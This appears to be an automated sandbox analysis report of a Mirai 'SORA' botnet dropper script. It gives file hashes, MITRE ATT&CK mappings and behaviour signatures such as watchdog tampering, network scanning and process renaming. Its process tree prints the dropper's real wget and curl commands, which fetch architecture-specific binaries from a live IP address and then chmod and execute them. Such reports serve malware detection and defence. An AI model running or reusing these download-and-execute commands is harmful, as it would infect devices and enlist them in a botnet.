mirai | a25b93fb96a73ebf680d9606a09bf2dbe01a84b1609eaee088f46b51edfbde0c

Analysis

max time kernel
106s
max time network
151s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-02-2025 14:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sora.sh
Size

1KB
MD5

77598e03349fb6b0ee595cb9fcbfe8bd
SHA1

a79cd4d6d9084771f259b07edd437cc73da63c7c
SHA256

a25b93fb96a73ebf680d9606a09bf2dbe01a84b1609eaee088f46b51edfbde0c
SHA512

f478bc7309e400a003c6dc28f0a6db9f1e8560582aa6acc626333f7cd81ff304260f9b9d5b894c0ad643e181b31e19df27377c469b079393c011ccb8a157941f

Score

10^/10

mirai sora botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (143856) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
807	chmod
846	chmod
856	chmod
862	chmod
868	chmod
874	chmod
745	chmod
780	chmod

Executes dropped EXE 8 IoCs

ioc	pid	Process
/tmp/robben	746	sora.sh
/tmp/robben	782	sora.sh
/tmp/robben	808	sora.sh
/tmp/robben	847	sora.sh
/tmp/robben	857	sora.sh
/tmp/robben	863	sora.sh
/tmp/robben	869	sora.sh
/tmp/robben	875	sora.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	robben

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx
behavioral3/files/fstream-2.dat	upx
behavioral3/files/fstream-3.dat	upx
behavioral3/files/fstream-5.dat	upx
behavioral3/files/fstream-6.dat	upx

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	h4idki1oe13mmngda	782	robben

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	robben

Reads runtime system information 41 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/789/exe	robben
File opened for reading	/proc/250/fd	robben
File opened for reading	/proc/387/fd	robben
File opened for reading	/proc/684/fd	robben
File opened for reading	/proc/335/fd	robben
File opened for reading	/proc/794/fd	robben
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/144/fd	robben
File opened for reading	/proc/336/fd	robben
File opened for reading	/proc/345/fd	robben
File opened for reading	/proc/431/fd	robben
File opened for reading	/proc/683/fd	robben
File opened for reading	/proc/706/fd	robben
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/882{1,1T	robben
File opened for reading	/proc/168/fd	robben
File opened for reading	/proc/339/fd	robben
File opened for reading	/proc/783/fd	robben
File opened for reading	/proc/789/fd	robben
File opened for reading	/proc/787/fd	robben
File opened for reading	/proc/791/fd	robben
File opened for reading	/proc/810/fd	robben
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/714/fd	robben
File opened for reading	/proc/716/fd	robben
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/fd	robben
File opened for reading	/proc/337/fd	robben
File opened for reading	/proc/392/fd	robben
File opened for reading	/proc/679/fd	robben
File opened for reading	/proc/785/exe	robben
File opened for reading	/proc/385/fd	robben
File opened for reading	/proc/675/fd	robben
File opened for reading	/proc/692/fd	robben
File opened for reading	/proc/802/fd	robben
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/785/fd	robben

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
779	cat
748	wget
751	curl

Writes file to tmp directory 17 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.mips	wget
File opened for modification	/tmp/sora.mpsl	wget
File opened for modification	/tmp/sora.arm4	curl
File opened for modification	/tmp/sora.mpsl	curl
File opened for modification	/tmp/sora.arm5	wget
File opened for modification	/tmp/sora.arm7	curl
File opened for modification	/tmp/sora.m68k	wget
File opened for modification	/tmp/sora.arm7	wget
File opened for modification	/tmp/sora.x86	wget
File opened for modification	/tmp/sora.x86	curl
File opened for modification	/tmp/sora.mips	curl
File opened for modification	/tmp/sora.arm6	wget
File opened for modification	/tmp/sora.arm6	curl
File opened for modification	/tmp/sora.ppc	wget
File opened for modification	/tmp/sora.ppc	curl
File opened for modification	/tmp/robben	sora.sh
File opened for modification	/tmp/sora.arm5	curl

/tmp/sora.sh
/tmp/sora.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:714
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:721
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:743
- /bin/cat
  cat sora.x86
  2⤵
  PID:744
- /bin/chmod
  chmod +x robben sora.sh sora.x86 systemd-private-8f888d1b5daf43ab9cb7470f321c1f69-systemd-timedated.service-IBXEDr
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/robben
  ./robben Payload
  2⤵
  PID:746
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:751
- /bin/cat
  cat sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:779
- /bin/chmod
  chmod +x robben sora.mips sora.sh sora.x86 systemd-private-8f888d1b5daf43ab9cb7470f321c1f69-systemd-timedated.service-IBXEDr
  2⤵
  - File and Directory Permissions Modification
  PID:780
- /tmp/robben
  ./robben Payload
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:782
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:788
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:805
- /bin/cat
  cat sora.mpsl
  2⤵
  PID:806
- /bin/chmod
  chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-8f888d1b5daf43ab9cb7470f321c1f69-systemd-timedated.service-IBXEDr
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/robben
  ./robben Payload
  2⤵
  PID:808
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.arm4
  2⤵
  PID:810
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:813
- /bin/cat
  cat sora.arm4
  2⤵
  PID:844
- /bin/chmod
  chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-8f888d1b5daf43ab9cb7470f321c1f69-systemd-timedated.service-IBXEDr
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/robben
  ./robben Payload
  2⤵
  PID:847
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:848
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:851
- /bin/cat
  cat sora.arm5
  2⤵
  PID:855
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/robben
  ./robben Payload
  2⤵
  PID:857
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:859
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/cat
  cat sora.arm6
  2⤵
  PID:861
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/robben
  ./robben Payload
  2⤵
  PID:863
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:865
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/cat
  cat sora.arm7
  2⤵
  PID:867
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/robben
  ./robben Payload
  2⤵
  PID:869
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:871
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/cat
  cat sora.ppc
  2⤵
  PID:873
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/robben
  ./robben Payload
  2⤵
  PID:875
- /usr/bin/wget
  wget http://141.11.25.78/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:877
- /usr/bin/curl
  curl -O http://141.11.25.78/bins/sora.m68k
  2⤵
  - Reads runtime system information
  PID:885

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/robben

Filesize
39KB

MD5
235f97612c47939069192857071b1241

SHA1
eebd627248c3074a04a4a590f9cfe52c61da4edd

SHA256
e8d833074c1359dc035ec53009be474e276ffa95154b95c14d643d934b4d521d

SHA512
9e409b0968573673ff4d060ba5d846a197ca24c9a9bb0d30e445733971706bd9cd9e472ec1922f64530122f5818054aa2b2cd161c74a3d8e160e16f5f1ade7c5

Download Submit
/tmp/robben

Filesize
42KB

MD5
20941cccec35b168a8158c69c062048e

SHA1
166752ba695b226ca7b9a27c0f06dae69f88464d

SHA256
09eeacc3bbe53aa5ff7dd53cf58287614079038156e63fcb5985e40a08367752

SHA512
4e5593a62b31dec40001c50d2cf8360afb94ed64af983c9265af04e10e636d4520d67ad768ef35d6ff33144617ab2b6fc1a392d06e85ab3cfe7fdeef534e490a

Download Submit
/tmp/robben

Filesize
43KB

MD5
1f995a68ebaaac17db62b7ad84318e63

SHA1
58d59e800176b32ba21403bc59fff2ebd3881cb5

SHA256
f6856b008d4992a82cb6fea48e957d5ab215687c575f510c1c58f76713a0d56b

SHA512
3d2bc7154a2ad26f20b068883f2cf16ff3b1e9c42c6406f99e67daeed75a52ba8f4af234c7a97fad1a2654c9ca219dfc225d528513f49635153bb423f67bb925

Download Submit
/tmp/robben

Filesize
196B

MD5
62962daa1b19bbcc2db10b7bfd531ea6

SHA1
d64bae91091eda6a7532ebec06aa70893b79e1f8

SHA256
80c3fe2ae1062abf56456f52518bd670f9ec3917b7f85e152b347ac6b6faf880

SHA512
9002a0475fdb38541e78048709006926655c726e93e823b84e2dbf5b53fd539a5342e7266447d23db0e5528e27a19961b115b180c94f2272ff124c7e5c8304e7

Download Submit
/tmp/robben

Filesize
22KB

MD5
7b8a902762dbab4993f4efb3128f6711

SHA1
4df7a14367a4af48f7ea494e3f60a61b3350ffdf

SHA256
4f88747663b2aa0915ef05a4d03f8f2e2f6ab0594fe6f71097a0066a1c59c262

SHA512
c51421fb0918d3a16bdce4ea5c0b23cd21ae202f1cdedbe2253a23bd8f79c291e96763617ceec70d76aaa611d3c4e83d03b3ce66159e7cd315b21fb299362bce

Download Submit
/tmp/robben

Filesize
50KB

MD5
b4573d88680753c3ce15f86e458a846d

SHA1
23aa3ebb691c02aceb52df02536d3e1b91d93499

SHA256
ee7e6113ece5a6bb631632fc1a6d1ae55e36f819b246c482f3f21ceb80716645

SHA512
18cafbf29c39cc3f946de20ea6a494c4329666faa0ce78d683bad5105190d871446c32adcc1b01e920bb138b6d8420070c8c6384231aa0a799d389ece5edadf8

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads